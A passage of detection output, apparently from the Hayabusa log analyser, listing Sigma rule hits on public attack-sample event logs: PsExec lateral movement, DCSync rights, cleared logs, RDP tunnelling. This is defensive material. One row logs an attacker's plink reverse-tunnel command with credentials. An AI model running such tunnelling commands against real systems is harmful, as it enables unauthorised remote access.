Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx -2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Malicious Nishang PowerShell 
Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx -2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx -2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx -2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx -2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: helpdesk : Workstation evil.internal.corp : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: EXCHANGE$ : Workstation EXCHANGE : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,informational,Logon Type 3 - Network,User: EXCHANGE$ : Workstation: EXCHANGE : IP Address: 192.168.111.87 : Port: 58128 : LogonID: 
0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx -2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,Logon Type 5 - Service,User: sshd_server : Workstation: PC02 : IP Address: - : Port: - : LogonID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x21f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 49164 : LogonID: 0x45120 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4a26d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49168 : LogonID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49169 : LogonID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx -2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,informational,Logon Type 11 - CachedInteractive,User: user01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 0 
: LogonID: 0x1414c8 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,informational,Logon Type 7 - Unlock,User: user01 : Workstation: PC01 : IP Address: - : Port: - : LogonID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 
0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: admin01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 49274 : LogonID: 0x14a321 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: admin01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 
+09:00,PC01.example.corp,4624,low,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx -2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test : Path: C:\Users\IEUser\Desktop\plink.exe : User: PC01\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation/sysmon_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation/win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: 
C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,informational,Process Creation,Command: 
C:\Windows\system32\TSTheme.exe -Embedding : Path: C:\Windows\System32\TSTheme.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: PC01\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx -2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 
10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: 
::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx -2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe 
